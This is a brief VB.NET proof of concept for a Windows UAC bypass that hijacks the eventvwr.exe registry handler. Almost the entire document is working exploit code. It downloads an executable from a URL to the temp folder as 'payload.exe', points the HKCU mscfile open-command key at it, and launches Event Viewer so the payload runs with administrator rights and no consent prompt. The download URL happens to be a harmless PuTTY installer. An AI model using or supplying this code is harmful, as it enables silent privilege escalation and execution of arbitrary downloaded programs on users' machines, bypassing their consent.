"Fileless" UAC Bypass Example - Windows 7/8/8.1/10

1. 'Tested on Windows Vista, 7, 8, 8.1, 10 32/64Bit
2. 'Based off; https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
3. 'Can be done in any language that supports interaction with Windows resistry
4. Module Module1
5.     Dim URLtoFile As String = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" 'URL to PayLoad
6.     Dim FilePath As String = IO.Path.GetTempPath
7.     'How this works
8.     'When eventvwr.exe is ran it starts a process call mmc.exe using the key HKLM\Software\Classes\mscfile\shell\open\command as admin
9.     'eventvwr.exe also will lounch the key in HLCU so you just make a key and lounch
10.     Sub Main()
11.         Dim Client As New Net.WebClient
12.         Client.DownloadFile(URLtoFile, FilePath + "payload.exe") 'Downlaod and Save the Payload
13.         Microsoft.Win32.Registry.CurrentUser.CreateSubKey("Software\Classes\mscfile\shell\open\command").SetValue("", FilePath + "payload.exe") 'Create a registry entry to the payload
14.         Process.Start("eventvwr.exe") 'Start Event Viewer
15.         'This makes Windows lounch the payload with admin rights, as a background application
16. 'You should also delete the key made so even viewer works normal again.
17.     End Sub
18.  
19. End Module